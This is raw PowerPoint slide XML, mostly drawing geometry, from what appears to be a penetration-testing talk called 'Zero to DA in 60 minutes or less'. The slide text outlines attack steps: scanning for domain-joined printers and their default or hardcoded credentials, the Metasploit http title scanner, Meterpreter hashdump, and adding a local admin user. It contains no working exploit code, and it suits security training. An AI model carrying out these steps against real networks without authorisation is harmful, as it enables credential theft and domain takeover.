            <a:off x="7126842" y="246221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EXPLOITATION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67226-30A1-EB0E-0C7F-0ABC322ECB2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734035" y="5034891"/>
            <a:ext cx="5729377" cy="6766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METERPRETER SESSIONS: </a:t>
            </a:r>
          </a:p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USE HASHDUMP COMMAND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998BA-7C07-B9E8-C7F7-F7D39C6C4DE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734034" y="5873996"/>
            <a:ext cx="5729377" cy="6766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COMMAND EXECUTION: </a:t>
            </a:r>
          </a:p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ADD LOCAL ADMIN USER</a:t>
            </a:r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 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022CC9-9CE5-DAC8-86D2-FE3293937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057" y="1363022"/>
            <a:ext cx="3499943" cy="1902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176C55-5DBB-6CA5-BFAE-1D5FB683C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800" y="4955577"/>
            <a:ext cx="3962200" cy="7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6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icture Placeholder 5" descr="Photocopier outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF22D60-F662-674C-F6C3-C022F8ACE45E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="236188" y="1716066"/>
            <a:ext cx="4661489" cy="4146673"/>
            <a:chOff x="236188" y="2429946"/>
            <a:chExt cx="4430147" cy="3432793"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="000000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B0883B3-EF5D-CF8E-F097-A8A147024D0F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="236188" y="3198749"/>
              <a:ext cx="1353442" cy="2538282"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 327874 w 1353442"/>
                <a:gd name="connsiteY0" fmla="*/ 537603 h 2538282"/>
                <a:gd name="connsiteX1" fmla="*/ 40407 w 1353442"/>
                <a:gd name="connsiteY1" fmla="*/ 414535 h 2538282"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 1353442"/>
                <a:gd name="connsiteY2" fmla="*/ 508785 h 2538282"/>
                <a:gd name="connsiteX3" fmla="*/ 327874 w 1353442"/>
                <a:gd name="connsiteY3" fmla="*/ 649134 h 2538282"/>
                <a:gd name="connsiteX4" fmla="*/ 327874 w 1353442"/>
                <a:gd name="connsiteY4" fmla="*/ 1050388 h 2538282"/>
                <a:gd name="connsiteX5" fmla="*/ 40407 w 1353442"/>
                <a:gd name="connsiteY5" fmla="*/ 927319 h 2538282"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 1353442"/>
                <a:gd name="connsiteY6" fmla="*/ 1021569 h 2538282"/>
                <a:gd name="connsiteX7" fmla="*/ 327874 w 1353442"/>
                <a:gd name="connsiteY7" fmla="*/ 1161918 h 2538282"/>
                <a:gd name="connsiteX8" fmla="*/ 327874 w 1353442"/>
                <a:gd name="connsiteY8" fmla="*/ 2358808 h 2538282"/>
                <a:gd name="connsiteX9" fmla="*/ 430431 w 1353442"/>
                <a:gd name="connsiteY9" fmla="*/ 2358808 h 2538282"/>
                <a:gd name="connsiteX10" fmla="*/ 609906 w 1353442"/>
                <a:gd name="connsiteY10" fmla="*/ 2538283 h 2538282"/>
                <a:gd name="connsiteX11" fmla="*/ 789380 w 1353442"/>
                <a:gd name="connsiteY11" fmla="*/ 2358808 h 2538282"/>
                <a:gd name="connsiteX12" fmla="*/ 891937 w 1353442"/>
                <a:gd name="connsiteY12" fmla="*/ 2358808 h 2538282"/>
                <a:gd name="connsiteX13" fmla="*/ 1071411 w 1353442"/>
                <a:gd name="connsiteY13" fmla="*/ 2538283 h 2538282"/>
                <a:gd name="connsiteX14" fmla="*/ 1250886 w 1353442"/>
                <a:gd name="connsiteY14" fmla="*/ 2358808 h 2538282"/>
                <a:gd name="connsiteX15" fmla="*/ 1353443 w 1353442"/>
                <a:gd name="connsiteY15" fmla="*/ 2358808 h 2538282"/>
                <a:gd name="connsiteX16" fmla="*/ 1353443 w 1353442"/>
                <a:gd name="connsiteY16" fmla="*/ 0 h 2538282"/>
                <a:gd name="connsiteX17" fmla="*/ 327874 w 1353442"/>
                <a:gd name="connsiteY17" fmla="*/ 0 h 2538282"/>
                <a:gd name="connsiteX18" fmla="*/ 609906 w 1353442"/>
                <a:gd name="connsiteY18" fmla="*/ 2435726 h 2538282"/>
                <a:gd name="connsiteX19" fmla="*/ 532988 w 1353442"/>
                <a:gd name="connsiteY19" fmla="*/ 2358808 h 2538282"/>
                <a:gd name="connsiteX20" fmla="*/ 686823 w 1353442"/>
                <a:gd name="connsiteY20" fmla="*/ 2358808 h 2538282"/>
                <a:gd name="connsiteX21" fmla="*/ 609906 w 1353442"/>
                <a:gd name="connsiteY21" fmla="*/ 2435726 h 2538282"/>
                <a:gd name="connsiteX22" fmla="*/ 1071411 w 1353442"/>
                <a:gd name="connsiteY22" fmla="*/ 2435726 h 2538282"/>
                <a:gd name="connsiteX23" fmla="*/ 994494 w 1353442"/>
                <a:gd name="connsiteY23" fmla="*/ 2358808 h 2538282"/>
                <a:gd name="connsiteX24" fmla="*/ 1148329 w 1353442"/>
                <a:gd name="connsiteY24" fmla="*/ 2358808 h 2538282"/>
                <a:gd name="connsiteX25" fmla="*/ 1071411 w 1353442"/>
                <a:gd name="connsiteY25" fmla="*/ 2435726 h 2538282"/>
                <a:gd name="connsiteX26" fmla="*/ 430431 w 1353442"/>
                <a:gd name="connsiteY26" fmla="*/ 102557 h 2538282"/>
                <a:gd name="connsiteX27" fmla="*/ 1250886 w 1353442"/>
                <a:gd name="connsiteY27" fmla="*/ 102557 h 2538282"/>
                <a:gd name="connsiteX28" fmla="*/ 1250886 w 1353442"/>
                <a:gd name="connsiteY28" fmla="*/ 2256252 h 2538282"/>
                <a:gd name="connsiteX29" fmla="*/ 430431 w 1353442"/>
                <a:gd name="connsiteY29" fmla="*/ 2256252 h 2538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53442" h="2538282">
                  <a:moveTo>
                    <a:pt x="327874" y="537603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="40407" y="414535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="508785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327874" y="649134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327874" y="1050388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40407" y="927319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1021569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327874" y="1161918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327874" y="2358808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430431" y="2358808"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="430431" y="2457930"/>
                    <a:pt x="510784" y="2538283"/>
                    <a:pt x="609906" y="2538283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="709027" y="2538283"/>
                    <a:pt x="789380" y="2457930"/>
                    <a:pt x="789380" y="2358808"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="891937" y="2358808"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="891937" y="2457930"/>
                    <a:pt x="972290" y="2538283"/>
                    <a:pt x="1071411" y="2538283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1170533" y="2538283"/>
                    <a:pt x="1250886" y="2457930"/>
                    <a:pt x="1250886" y="2358808"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1353443" y="2358808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1353443" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327874" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="609906" y="2435726"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="567426" y="2435726"/>
                    <a:pt x="532988" y="2401287"/>
                    <a:pt x="532988" y="2358808"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="686823" y="2358808"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="686823" y="2401287"/>
                    <a:pt x="652385" y="2435726"/>
                    <a:pt x="609906" y="2435726"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1071411" y="2435726"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1028932" y="2435726"/>
                    <a:pt x="994494" y="2401287"/>
                    <a:pt x="994494" y="2358808"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1148329" y="2358808"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1148329" y="2401287"/>
                    <a:pt x="1113890" y="2435726"/>
                    <a:pt x="1071411" y="2435726"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="430431" y="102557"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1250886" y="102557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1250886" y="2256252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430431" y="2256252"/>
                  </a:ln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34B811A-7FCD-13A3-E334-B89EC50E243E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1692187" y="2429946"/>
              <a:ext cx="2974148" cy="3307085"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 615341 w 2974148"/>
                <a:gd name="connsiteY0" fmla="*/ 768803 h 3307085"/>
                <a:gd name="connsiteX1" fmla="*/ 615341 w 2974148"/>
                <a:gd name="connsiteY1" fmla="*/ 655221 h 3307085"/>
                <a:gd name="connsiteX2" fmla="*/ 2883744 w 2974148"/>
                <a:gd name="connsiteY2" fmla="*/ 100696 h 3307085"/>
                <a:gd name="connsiteX3" fmla="*/ 2919434 w 2974148"/>
                <a:gd name="connsiteY3" fmla="*/ 37567 h 3307085"/>
                <a:gd name="connsiteX4" fmla="*/ 2859438 w 2974148"/>
                <a:gd name="connsiteY4" fmla="*/ 1113 h 3307085"/>
                <a:gd name="connsiteX5" fmla="*/ 613956 w 2974148"/>
                <a:gd name="connsiteY5" fmla="*/ 549793 h 3307085"/>
                <a:gd name="connsiteX6" fmla="*/ 461506 w 2974148"/>
                <a:gd name="connsiteY6" fmla="*/ 409854 h 3307085"/>
                <a:gd name="connsiteX7" fmla="*/ 153835 w 2974148"/>
                <a:gd name="connsiteY7" fmla="*/ 409854 h 3307085"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 2974148"/>
                <a:gd name="connsiteY8" fmla="*/ 563689 h 3307085"/>
                <a:gd name="connsiteX9" fmla="*/ 0 w 2974148"/>
                <a:gd name="connsiteY9" fmla="*/ 3127611 h 3307085"/>
                <a:gd name="connsiteX10" fmla="*/ 153835 w 2974148"/>
                <a:gd name="connsiteY10" fmla="*/ 3127611 h 3307085"/>
                <a:gd name="connsiteX11" fmla="*/ 333310 w 2974148"/>
                <a:gd name="connsiteY11" fmla="*/ 3307086 h 3307085"/>
                <a:gd name="connsiteX12" fmla="*/ 512784 w 2974148"/>
                <a:gd name="connsiteY12" fmla="*/ 3127611 h 3307085"/>
                <a:gd name="connsiteX13" fmla="*/ 2461364 w 2974148"/>
                <a:gd name="connsiteY13" fmla="*/ 3127611 h 3307085"/>
                <a:gd name="connsiteX14" fmla="*/ 2640839 w 2974148"/>
                <a:gd name="connsiteY14" fmla="*/ 3307086 h 3307085"/>
                <a:gd name="connsiteX15" fmla="*/ 2820313 w 2974148"/>
                <a:gd name="connsiteY15" fmla="*/ 3127611 h 3307085"/>
                <a:gd name="connsiteX16" fmla="*/ 2974148 w 2974148"/>
                <a:gd name="connsiteY16" fmla="*/ 3127611 h 3307085"/>
                <a:gd name="connsiteX17" fmla="*/ 2974148 w 2974148"/>
                <a:gd name="connsiteY17" fmla="*/ 768803 h 3307085"/>
                <a:gd name="connsiteX18" fmla="*/ 333310 w 2974148"/>
                <a:gd name="connsiteY18" fmla="*/ 3204529 h 3307085"/>
                <a:gd name="connsiteX19" fmla="*/ 256392 w 2974148"/>
                <a:gd name="connsiteY19" fmla="*/ 3127611 h 3307085"/>
                <a:gd name="connsiteX20" fmla="*/ 410227 w 2974148"/>
                <a:gd name="connsiteY20" fmla="*/ 3127611 h 3307085"/>
                <a:gd name="connsiteX21" fmla="*/ 333310 w 2974148"/>
                <a:gd name="connsiteY21" fmla="*/ 3204529 h 3307085"/>
                <a:gd name="connsiteX22" fmla="*/ 2640839 w 2974148"/>
                <a:gd name="connsiteY22" fmla="*/ 3204529 h 3307085"/>
                <a:gd name="connsiteX23" fmla="*/ 2563921 w 2974148"/>
                <a:gd name="connsiteY23" fmla="*/ 3127611 h 3307085"/>
                <a:gd name="connsiteX24" fmla="*/ 2717756 w 2974148"/>
                <a:gd name="connsiteY24" fmla="*/ 3127611 h 3307085"/>
                <a:gd name="connsiteX25" fmla="*/ 2640839 w 2974148"/>
                <a:gd name="connsiteY25" fmla="*/ 3204529 h 3307085"/>
                <a:gd name="connsiteX26" fmla="*/ 2871591 w 2974148"/>
                <a:gd name="connsiteY26" fmla="*/ 3025055 h 3307085"/>
                <a:gd name="connsiteX27" fmla="*/ 102557 w 2974148"/>
                <a:gd name="connsiteY27" fmla="*/ 3025055 h 3307085"/>
                <a:gd name="connsiteX28" fmla="*/ 102557 w 2974148"/>
                <a:gd name="connsiteY28" fmla="*/ 2307156 h 3307085"/>
                <a:gd name="connsiteX29" fmla="*/ 2871591 w 2974148"/>
                <a:gd name="connsiteY29" fmla="*/ 2307156 h 3307085"/>
                <a:gd name="connsiteX30" fmla="*/ 2871591 w 2974148"/>
                <a:gd name="connsiteY30" fmla="*/ 2204600 h 3307085"/>
                <a:gd name="connsiteX31" fmla="*/ 102557 w 2974148"/>
                <a:gd name="connsiteY31" fmla="*/ 2204600 h 3307085"/>
                <a:gd name="connsiteX32" fmla="*/ 102557 w 2974148"/>
                <a:gd name="connsiteY32" fmla="*/ 1486701 h 3307085"/>
                <a:gd name="connsiteX33" fmla="*/ 2871591 w 2974148"/>
                <a:gd name="connsiteY33" fmla="*/ 1486701 h 3307085"/>
                <a:gd name="connsiteX34" fmla="*/ 102557 w 2974148"/>
                <a:gd name="connsiteY34" fmla="*/ 1384144 h 3307085"/>
                <a:gd name="connsiteX35" fmla="*/ 102557 w 2974148"/>
                <a:gd name="connsiteY35" fmla="*/ 563689 h 3307085"/>
                <a:gd name="connsiteX36" fmla="*/ 153835 w 2974148"/>
                <a:gd name="connsiteY36" fmla="*/ 512411 h 3307085"/>
                <a:gd name="connsiteX37" fmla="*/ 461506 w 2974148"/>
                <a:gd name="connsiteY37" fmla="*/ 512411 h 3307085"/>
                <a:gd name="connsiteX38" fmla="*/ 512784 w 2974148"/>
                <a:gd name="connsiteY38" fmla="*/ 563689 h 3307085"/>
                <a:gd name="connsiteX39" fmla="*/ 512784 w 2974148"/>
                <a:gd name="connsiteY39" fmla="*/ 871360 h 3307085"/>
                <a:gd name="connsiteX40" fmla="*/ 2871591 w 2974148"/>
                <a:gd name="connsiteY40" fmla="*/ 871360 h 3307085"/>
                <a:gd name="connsiteX41" fmla="*/ 2871591 w 2974148"/>
                <a:gd name="connsiteY41" fmla="*/ 1384144 h 3307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974148" h="3307085">
                  <a:moveTo>
                    <a:pt x="615341" y="768803"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="615341" y="655221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883744" y="100696"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2911030" y="93117"/>
                    <a:pt x="2927008" y="64853"/>
                    <a:pt x="2919434" y="37567"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2912189" y="11487"/>
                    <a:pt x="2885924" y="-4476"/>
                    <a:pt x="2859438" y="1113"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="613956" y="549793"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="606937" y="470762"/>
                    <a:pt x="540849" y="410100"/>
                    <a:pt x="461506" y="409854"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="153835" y="409854"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="68872" y="409854"/>
                    <a:pt x="0" y="478726"/>
                    <a:pt x="0" y="563689"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="3127611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153835" y="3127611"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="153835" y="3226733"/>
                    <a:pt x="234189" y="3307086"/>
                    <a:pt x="333310" y="3307086"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="432431" y="3307086"/>
                    <a:pt x="512784" y="3226733"/>
                    <a:pt x="512784" y="3127611"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2461364" y="3127611"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2461364" y="3226733"/>
                    <a:pt x="2541717" y="3307086"/>
                    <a:pt x="2640839" y="3307086"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2739960" y="3307086"/>
                    <a:pt x="2820313" y="3226733"/>
                    <a:pt x="2820313" y="3127611"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2974148" y="3127611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2974148" y="768803"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="333310" y="3204529"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="290831" y="3204529"/>
                    <a:pt x="256392" y="3170091"/>
                    <a:pt x="256392" y="3127611"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="410227" y="3127611"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="410227" y="3170091"/>
                    <a:pt x="375789" y="3204529"/>
                    <a:pt x="333310" y="3204529"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2640839" y="3204529"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2598360" y="3204529"/>
                    <a:pt x="2563921" y="3170091"/>
                    <a:pt x="2563921" y="3127611"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2717756" y="3127611"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2717756" y="3170091"/>
                    <a:pt x="2683318" y="3204529"/>
                    <a:pt x="2640839" y="3204529"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2871591" y="3025055"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="102557" y="3025055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102557" y="2307156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2871591" y="2307156"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2871591" y="2204600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="102557" y="2204600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102557" y="1486701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2871591" y="1486701"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102557" y="1384144"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="102557" y="563689"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="102557" y="535368"/>
                    <a:pt x="125514" y="512411"/>
                    <a:pt x="153835" y="512411"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="461506" y="512411"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="489827" y="512411"/>
                    <a:pt x="512784" y="535368"/>
                    <a:pt x="512784" y="563689"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="512784" y="871360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2871591" y="871360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2871591" y="1384144"/>
                  </a:ln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CAD993A-B361-EB9A-1E6D-5F02E7029E57}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2871591" y="4224318"/>
              <a:ext cx="666619" cy="102556"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 666619"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 102556"/>
                <a:gd name="connsiteX1" fmla="*/ 666619 w 666619"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 102556"/>
                <a:gd name="connsiteX2" fmla="*/ 666619 w 666619"/>
                <a:gd name="connsiteY2" fmla="*/ 102557 h 102556"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 666619"/>
                <a:gd name="connsiteY3" fmla="*/ 102557 h 1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619" h="102556">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="666619" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666619" y="102557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="102557"/>
                  </a:ln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111FB96-8AE2-8CD2-23D5-7DE6D69672AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2871591" y="5044773"/>
              <a:ext cx="666619" cy="102556"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 666619"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 102556"/>
                <a:gd name="connsiteX1" fmla="*/ 666619 w 666619"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 102556"/>
                <a:gd name="connsiteX2" fmla="*/ 666619 w 666619"/>
                <a:gd name="connsiteY2" fmla="*/ 102557 h 102556"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 666619"/>
                <a:gd name="connsiteY3" fmla="*/ 102557 h 1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619" h="102556">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="666619" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666619" y="102557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="102557"/>
                  </a:ln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471533"/>
            <a:ext cx="6451592" cy="494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DOMAIN JOINED PRINTERS WITH SCAN/email CAPABILITIES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127035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TO IDENTIFY HOSTS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8718" y="2625475"/>
            <a:ext cx="6451592" cy="384721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1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SCAN FOR OPEN WEB PORTS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HARDCODED CREDENTIALS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7D4AE9B-F295-0D1A-0497-ED9775411D22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="3123916"/>
            <a:ext cx="6451592" cy="384721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1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BREAK IPS OUT BY PORT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58A1F8-C505-CE3D-ADE5-7E8C4F323667}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="3622357"/>
            <a:ext cx="6451592" cy="384721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1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METASPLOIT TO RETRIEVE TITLES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EEFCE-1B7D-61AE-168B-1E26554FBB5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="4120798"/>
            <a:ext cx="6451592" cy="384721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1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auxiliary/scanner/http/title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03F955-1984-A115-4083-8F63536592BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="4637425"/>
            <a:ext cx="6451592" cy="596995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GREP FOR HP, VIRATA, TOSHIBA, TOPACCESS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9A6333-8979-E5D3-B59C-5E472907317D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="5342733"/>
            <a:ext cx="6451592" cy="596995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln w="127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LOOK FOR DEFAULT OR OPEN AUTHENTICATION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A1CE464B-9504-130A-1063-8A605ED33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0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347025" y="1551192"/>
            <a:ext cx="282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Intro</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="40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347025" y="3451242"/>
            <a:ext cx="6858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Expand Footprint</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="40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347025" y="2501217"/>
            <a:ext cx="429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Get Creds</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="40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20463" y="105550"/>
            <a:ext cx="12151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ZERO TO DA IN 60 MINUTES OR LESS</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="40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414305-D4C1-6042-81F1-DB0EBAF199AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347025" y="4428474"/>
            <a:ext cx="444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Reporting</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="4000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2F35F-CF03-4273-7635-A3BA453314F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9952214" y="1556647"/>
            <a:ext cx="118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Poppins SemiBold" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1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  <a:cs typeface="Poppins SemiBol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0BE69-99E6-7C64-A14C-B8652E9E5626}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9952213" y="2501217"/>
            <a:ext cx="1336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Poppins SemiBold" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1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  <a:cs typeface="Poppins Semi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65577-4E3F-060E-4101-B613ACB6C685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9952214" y="3456963"/>
            <a:ext cx="142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Poppins SemiBold" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1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  <a:cs typeface="Poppins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95055-4493-5B51-2D36-ADD6E5EA5B6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9952214" y="4403639"/>
            <a:ext cx="1336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spc="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFCC28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Poppins SemiBold" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1" spc="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFCC28"/>
              </a:solidFill>
              <a:latin typeface="Good Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
              <a:ea typeface="Dela Gothic One" panose="00000500000000000000" pitchFamily="2" charset="-128"/>
